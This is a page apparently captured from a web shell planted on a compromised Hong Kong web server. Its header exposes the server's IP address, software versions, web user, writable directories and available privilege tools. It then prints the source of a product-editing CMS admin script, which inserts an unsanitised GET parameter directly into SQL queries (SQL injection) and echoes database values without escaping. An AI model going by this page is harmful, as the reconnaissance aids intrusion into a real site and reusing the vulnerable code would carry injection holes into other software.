403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/litedemo/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/litedemo/webadmin/proddet_modifyform.php
<?php
include 'config.php';

// Check if the user is logged in

if ((!isSet($_SESSION['loginname'])) || ($loggin <> '1'))
{
header("Location: login.php");
exit;
}
require("configure.php");
require("fckeditor/fckeditor.php");
$prodcatid 			= $_GET["prodcatid"];
$prodid 			= $_GET["prodid"];
?>
<html>
<head>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Content Management System (CMS)</title>
</head>
<body>
<?php
$sql = "SELECT * FROM proddetail WHERE prodid=". $prodid ." ";
$result=mysql_query($sql);
$row = mysql_fetch_array($result,MYSQL_ASSOC);
$result9 = mysql_query("SELECT * FROM cms_login WHERE cmsloginid=". $row{'cmsloginid'} ." ");
$row9 = mysql_fetch_array($result9,MYSQL_ASSOC);
?>
<form action="proddet_modify.php" method="post" name="modifyform" enctype="multipart/form-data">
<input type="hidden" name="prodcatid" value="<?=$row{'prodcatid'};?>">
<input type="hidden" name="prodid" value="<?=$row{'prodid'};?>">
<table width="800" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td height="70" align="right" valign="middle" class="icontxt"><table border="0" cellpadding="0" cellspacing="0">
      <tr>        
        <td width="50" align="center"><a href="#" onClick="modifyform.submit()"><img src="images/iconSave.png" alt="Save" width="32" height="32" border="0"><br>
          &nbsp;Save&nbsp;&nbsp;</a></td>
        <td width="50" align="center"><a href="prodcat_index.php?pid=<?=$prodcatid;?>&msg=Cancel"><img src="images/iconCancel.png" alt="Cancel" width="32" height="32" border="0"><br>
          &nbsp;Cancel&nbsp;&nbsp;</a></td>
        <td>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
	<td><span style="float:left;" class="pagetitletxt">&nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle" /> Modify Product Detail </b></span><span style="float:right;" class="msg">Last Update: <?=$row9{'cmsusername'}.'&nbsp;&nbsp;&nbsp;'.$row{'modifyday'};?></span></td>
  </tr>
  <tr>
    <td align="left" valign="middle"><!-- Content -->
	<table>
		<tr><td width="120" align="right" valign="top" class='content'>Code</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="prodcode" value="<?=$row{'prodcode'}?>" size="50" maxlength="20"><br><span class="msg">Maxlength:20</span></td>
		</tr>
		<?php 
		  $x = 1; 
		  $result3 = mysql_query("SELECT * FROM prodimage WHERE prodid = '".$row{'prodid'}."' ORDER BY prodimagesort ASC ");
		  $cntimage = mysql_num_rows($result3);
		  while ($row3 = mysql_fetch_array($result3,MYSQL_ASSOC))
			{ ?>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Image <?=$x;?></td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input name="prodimage[<?=$x;?>]" type="file" class="content" size="50"><a href="../products/thumb/<?=$row3{'prodimage'};?>" target="_blank"><img src="images/icon_Search.jpg"  border="0" align="absmiddle">View File</a><input type="checkbox" name="delimage[<?=$x;?>]" value="<?=$x;?>">Delete Image<br />
			<span class="msg">Image format: bmp,gif,jpg,png | Size: 800px(W) x 600px(H)</span><br /><br /></td>
		</tr>
		<?php $x++; } ?>
		<?php for($i=$cntimage+1;$i<=6;$i++){ ?>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Image<?=$i;?></td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input name="prodimage[<?=$i;?>]" type="file" class="content" size="50"><br />
			<span class="msg">Image format: bmp,gif,jpg,png | Size: 800px(W) x 600px(H)</span><br /><br /></td>
		</tr>
		<?php } ?>
		<tr>
			<td width="120" align="right" valign="top" class='content'><b>English</b></td>
			<td class='content' valign="top">&nbsp;</td>
			<td class='content'>&nbsp;</td>
		</tr>		
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Name</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="prodnameen" value="<?=$row{'prodnameen'}?>" size="50" maxlength="500"><br><span class="msg">Maxlength:500</span></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";
					
					$oFCKeditor = new FCKeditor('proddescen') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= str_replace("\r", '', preg_replace( "/\n/", "", $row{'proddescen'} ));
					$oFCKeditor->Width 		= 670;
					$oFCKeditor->Height		= 500;
					$oFCKeditor->Create() ;			
					?><br><span class="msg">Maxwidth:650</span><br></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'><b>Traditional Chinese</b></td>
			<td class='content' valign="top">&nbsp;</td>
			<td class='content'>&nbsp;</td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Name</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="prodnametc" value="<?=$row{'prodnametc'}?>" size="50" maxlength="500"><br><span class="msg">Maxlength:500</span></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";
					
					$oFCKeditor = new FCKeditor('proddesctc') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= str_replace("\r", '', preg_replace( "/\n/", "", $row{'proddesctc'} ));
					$oFCKeditor->Width 		= 670;
					$oFCKeditor->Height		= 500;
					$oFCKeditor->Create() ;			
					?><br><span class="msg">Maxwidth:650</span><br></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'><b>Simplified Chinese</b></td>
			<td class='content' valign="top">&nbsp;</td>
			<td class='content'>&nbsp;</td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Name</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="prodnamesc" value="<?=$row{'prodnamesc'}?>" size="50" maxlength="500"><br><span class="msg">Maxlength:500</span></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";
					
					$oFCKeditor = new FCKeditor('proddescsc') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= str_replace("\r", '', preg_replace( "/\n/", "", $row{'proddescsc'} ));
					$oFCKeditor->Width 		= 670;
					$oFCKeditor->Height		= 500;
					$oFCKeditor->Create() ;			
					?><br><span class="msg">Maxwidth:650</span><br></td>
		</tr>
	</table>		
	<!-- End Content --></td>
  </tr>
  <tr>
    <td align="left" valign="middle">&nbsp;</td>
  </tr>
</table>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit